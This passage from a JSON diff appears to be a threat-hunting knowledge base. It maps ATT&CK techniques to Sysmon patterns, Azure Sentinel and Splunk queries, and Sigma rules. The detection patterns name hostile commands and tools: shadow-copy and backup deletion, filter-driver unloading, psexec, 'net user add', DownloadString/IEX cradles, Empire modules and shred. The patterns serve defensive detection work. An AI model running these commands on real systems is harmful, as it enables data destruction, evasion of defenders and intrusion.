"type": "process", + "process": { + "image": { + "pattern": "\\windows\\hh.exe" + } + }, + "file": { + "path": { + "pattern": ".chm" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "hh.exe|.chm", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"hh.exe\"", + "name": "Compiled HTML File" + } + ], + "possible_detections": [], + "external_reference": [ + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + { + "technique_id": "C1000", + "command_list": [ + "\\\\Windows\\\\.+\\\\reg.exe" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\reg.exe", + "source": "SysmonHunter - Registry Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Registry Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\reg.exe", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1001", + "command_list": [ + "nbtscan.exe|psexec", + "net|user|add", + "net|/add" + ], + "commands": [ + { + "command": "nbtscan.exe|psexec", + "source": "SysmonHunter - Lateral Movement", + "name": "" + }, + { + "command": "net|user|add", + "source": "SysmonHunter - Lateral Movement", + "name": "" + }, + { + "command": "net|/add", + "source": "SysmonHunter - Lateral Movement", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Lateral Movement", + "description": null, + "level": "high", + "phase": "Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "nbtscan.exe|psexec" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "net|user|add", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "net|/add", + "op": "and" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1002", + "command_list": [ + "\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe" + ], + "commands": [ + { + "command": "\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe", + "source": "SysmonHunter - .Net Environment Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": ".Net Environment Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\csc.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\InstallUtil.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegAsm.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\RegSvcs.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\MSBuild.exe|\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\.+\\\\taskhost.exe", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1003", + "command_list": [ + "inetsrv\\appcmd.exe/dontLog:true", + "fltmc.exeunload|detach", + "vssadmin.exeDelete|Shadows", + "wbadmindelete" + ], + "commands": [ + { + "command": "inetsrv\\appcmd.exe/dontLog:true", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "fltmc.exeunload|detach", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "vssadmin.exeDelete|Shadows", + "source": "SysmonHunter - None", + "name": "" + }, + { + "command": "wbadmindelete", + "source": "SysmonHunter - None", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": null, + "description": null, + "level": "high", + "phase": "Defense Evasion", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "inetsrv\\appcmd.exe" + }, + "cmdline": { + "pattern": "/dontLog:true" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "fltmc.exe" + }, + "cmdline": { + "pattern": "unload|detach" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "vssadmin.exe" + }, + "cmdline": { + "pattern": "Delete|Shadows", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wbadmin" + }, + "cmdline": { + "pattern": "delete" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1004", + "command_list": [ + "\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "\\\\Windows\\\\.+\\\\sc.exequery", + "\\\\Windows\\\\.+\\\\netsh.exeadvfirewall" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "source": "SysmonHunter - Discovery", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\sc.exequery", + "source": "SysmonHunter - Discovery", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\netsh.exeadvfirewall", + "source": "SysmonHunter - Discovery", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Discovery", + "description": null, + "level": "medium", + "phase": "Discovery", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\net.exe|wmic.exe|\\\\Windows\\\\.+\\\\ipconfig.exe|nbtstat|tasklist.exe|systeminfo.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\sc.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "query" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\netsh.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "advfirewall" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1005", + "command_list": [ + "\\\\Windows\\\\.+\\\\svchost.exe-k|DcomLaunch\\Internet Explorer\\iexplore.exe-Embedding" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\svchost.exe-k|DcomLaunch\\Internet Explorer\\iexplore.exe-Embedding", + "source": "SysmonHunter - IE DCOM Launch", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "IE DCOM Launch", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "procchain", + "parent": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\svchost.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "-k|DcomLaunch", + "op": "and" + } + }, + "child": { + "image": { + "pattern": "\\Internet Explorer\\iexplore.exe" + }, + "cmdline": { + "pattern": "-Embedding" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "C1006", + "command_list": [ + "80|443" + ], + "commands": [ + { + "command": "80|443", + "source": "SysmonHunter - HTTP or HTTPS Communication", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "HTTP or HTTPS Communication", + "description": null, + "level": "medium", + "phase": "Command and Control", + "query": [ + { + "type": "network", + "network": { + "rport": { + "pattern": "80|443" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T0000", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"Get-History\"or process_command_line contains \"AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadline\\\\ConsoleHost_history.txt\"or process_command_line contains \"(Get-PSReadlineOption).HistorySavePath\")", + "name": "Console History" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 17 and (pipe_name contains \"\\\\isapi_http\"or pipe_name contains \"\\\\isapi_dg\"or pipe_name contains \"\\\\isapi_dg2\"or pipe_name contains \"\\\\isapi_http\"or pipe_name contains \"\\\\sdlrpc\"or pipe_name contains \"\\\\aheec\"or pipe_name contains \"\\\\winsession\"or pipe_name contains \"\\\\lsassw\"or pipe_name contains \"\\\\rpchlp_3\"or pipe_name contains \"\\\\NamePipe_MoreWindows\"or pipe_name contains \"\\\\pcheap_reuse\"or pipe_name contains \"\\\\PSEXESVC\"or pipe_name contains \"\\\\PowerShellISEPipeName_\"or pipe_name contains \"\\\\csexec\"or pipe_name contains \"\\\\paexec\"or pipe_name contains \"\\\\remcom\")", + "name": "Named Pipes" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 17 and pipe_name contains \"\\\\msagent_\"", + "name": "Named Pipes CobaltStrike" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"qwinsta.exe\"", + "name": "Remotely Query Login Sessions Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"qwinsta.exe\"", + "name": "Remotely Query Login Sessions Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path == \"a.exe\"or process_path == \"b.exe\"or process_path == \"c.exe\"or process_path == \"d.exe\"or process_path == \"e.exe\"or process_path == \"f.exe\"or process_path == \"g.exe\"or process_path == \"h.exe\"or process_path == \"i.exe\"or process_path == \"j.exe\"or process_path == \"k.exe\"or process_path == \"l.exe\"or process_path == \"m.exe\"or process_path == \"n.exe\"or process_path == \"o.exe\"or process_path == \"p.exe\"or process_path == \"q.exe\"or process_path == \"r.exe\"or process_path == \"s.exe\"or process_path == \"t.exe\"or process_path == \"u.exe\"or process_path == \"v.exe\"or process_path == \"w.exe\"or process_path == \"x.exe\"or process_path == \"y.exe\"or process_path == \"z.exe\"or process_path == \"1.exe\"or process_path == \"2.exe\"or process_path == \"3.exe\"or process_path == \"4.exe\"or process_path == \"5.exe\"or process_path == \"6.exe\"or process_path == \"7.exe\"or process_path == \"8.exe\"or process_path == \"9.exe\"or process_path == \"0.exe\"or process_path == \"10.exe\")", + "name": "Suspicious Filename Used" + } + ], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\\"", + "name": "Local Port Monitor" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "AutoRuns" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ] + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38" + ] + }, + { + "technique_id": "T1054", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"fltmc.exe\" or process_command_line contains \"*fltmc*unload*\")", + "name": "Indicator Blocking Driver Unloaded" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SysmonDrv\\\\*\"or registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Sysmon\\\\*\"or registry_key_path contains \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Sysmon64\\\\*\")and (process_path !contains \"Sysmon64.exe\" or process_path !contains \"Sysmon.exe\")", + "name": "Indicator Blocking Sysmon Registry Edited From Other Source" + } + ], + "possible_detections": [ + { + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\". Please note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.", + "references": [ + "https://bit.ly/WinLogsZero2Hero" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1054" + ], + "author": "@neu5ron", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Computer Management > Audit Policy Configuration, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit Authorization Policy Change" + }, + "detection": { + "selection": { + "EventID": 4719, + "AuditPolicyChanges": "removed" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688.0" + ], + [ + "Sensor health and status" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sensor health and status" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1063", + "command_list": [ + "powershell/situational_awareness/host/antivirusproduct" + ], + "commands": [ + { + "command": "powershell/situational_awareness/host/antivirusproduct", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/situational_awareness/host/antivirusproduct", + "ATT&CK Technique #1": "T1063", + "ATT&CK Technique #2": "", + "Technique": "Security Software Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/antivirusproduct\": [\"T1063\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and(process_path contains \"netsh.exe\"or process_path contains \"reg.exe\"or process_path contains \"tasklist.exe\")and (process_command_line contains \"*reg* query*\"or process_command_line contains \"*tasklist *\"or process_command_line contains \"*netsh*\"or process_command_line contains \"*fltmc*|*findstr*\")", + "name": "Security Software Discovery" + } + ], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1074", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"DownloadString\"and process_command_line contains \"Net.WebClient\")or (process_command_line contains \"New-Object\"and process_command_line contains \"IEX\")", + "name": "Datal Staged Process" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1089", + "command_list": [ + "powershell/management/disable_rdp" + ], + "commands": [ + { + "command": "powershell/management/disable_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/disable_rdp", + "ATT&CK Technique #1": "T1089", + "ATT&CK Technique #2": "", + "Technique": "Disabling Security Tools", + "Concatenate for Python Dictionary": "\"powershell/management/disable_rdp\": [\"T1089\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"net.exe\"or process_path contains \"sc.exe\")and file_directory contains \"stop\"", + "name": "Disabling Security Tools Service Stopped" + } + ], + "possible_detections": [ + { + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "references": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/" + ], + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1089" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management" + }, + "detection": { + "selection": { + "EventID": 4738 + }, + "keywords": { + "Message": [ + "*DES*", + "*Preauth*", + "*Encrypted*" + ] + }, + "filters": { + "Message": [ + "*Enabled*" + ] + }, + "condition": "selection and keywords and filters" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4689", + "Process Term" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Changed" + ], + [ + "API monitoring" + ], + [ + "Anti-virus" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4689", + "Process Term" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Changed" + ], + [ + "API monitoring" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1093", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and ( ( process_path contains \"smss.exe\" and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"csrss.exe\" and ( process_parent_command_line !contains \"smss.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"wininit.exe\"and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"winlogon.exe\" and process_parent_command_line !contains \"smss.exe\" ) or ( process_path contains \"lsass.exe\" and process_parent_command_line !contains \"wininit.exe\" ) or ( process_path contains \"LogonUI.exe\" and ( process_parent_command_line !contains \"winlogon.exe\" and process_parent_command_line !contains \"wininit.exe\" ) ) or ( process_path contains \"services.exe\" and process_parent_command_line !contains \"wininit.exe\" ) or ( process_path contains \"spoolsv.exe\" and process_parent_command_line !contains \"services.exe\" ) or ( process_path contains \"taskhost.exe\" and ( process_parent_command_line !contains \"services.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"taskhostw.exe\" and ( process_parent_command_line !contains \"services.exe\" and process_parent_command_line !contains \"svchost.exe\" ) ) or ( process_path contains \"userinit.exe\" and ( process_parent_command_line !contains \"dwm.exe\" and process_parent_command_line !contains \"winlogon.exe\" ) ))| extend AccountCustomEntity = UserName| extend HostCustomEntity = Computer| extend FileHashCustomEntity = hash_sha256", + "name": "Process Hollowing" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "LMD - B9" + ], + [ + "API monitoring" + ], + [ + "Check with Fred" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "API monitoring" + ], + [ + "Check with Fred" + ] + ], + "external_reference": [ + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1096", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"fsutil.exe\" and process_command_line contains \"*usn*deletejournal*\"", + "name": "NTFS File Attributes" + } + ], + "possible_detections": [ + { + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "experimental", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "references": [ + "http://www.powertheshell.com/ntfsstreams/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1096" + ], + "author": "Sami Ruohonen", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keyword1": [ + "set-content" + ], + "keyword2": [ + "-stream" + ], + "condition": "keyword1 and keyword2" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + [ + "4663", + "File monitoring" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "LMD", + "EA", + " ADS", + "Hash Compare" + ], + [ + "4663", + "File monitoring" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ] + ], + "external_reference": [ + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1107", + "command_list": [ + "```", + "rm -rf test1.text", + "rm -f test1.txt", + "shred -u test1.txt" + ], + "commands": [ + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -rf test1.text", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -f test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "shred -u test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"*remove-item*\"or process_command_line contains \"vssadmin*Delete Shadows /All /Q*\"or process_command_line contains \"*wmic*shadowcopy delete*\"or process_command_line contains \"*wbdadmin* delete catalog -q*\"or process_command_line contains \"*bcdedit*bootstatuspolicy ignoreallfailures*\"or process_command_line contains \"*bcdedit*recoveryenabled no*\")", + "name": "File Deletion" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=59 comm=shred | table host,auid,msg", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=execve shred .bash_history | table host,msg,a0,a2", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table host,auid,uid,eid,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": 